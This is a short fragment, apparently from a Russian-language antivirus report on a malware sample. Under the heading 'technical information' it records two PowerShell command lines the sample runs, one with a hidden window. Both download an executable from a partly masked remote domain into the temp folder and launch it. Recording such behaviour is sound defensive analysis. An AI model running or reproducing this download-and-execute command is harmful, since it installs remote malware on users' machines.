Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = $env:temp + '\RNEUgKwJU.exe';WGet 'http://sw#####rningfirm.work/Remember.exe' -outFiLe $a;start $a
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $a = $env:temp + '\RNEUgKwJU.exe';WGet 'http://sw#####rningfirm.work/Remember.exe' -outFiLe $a;start $a' (со скрытым окном)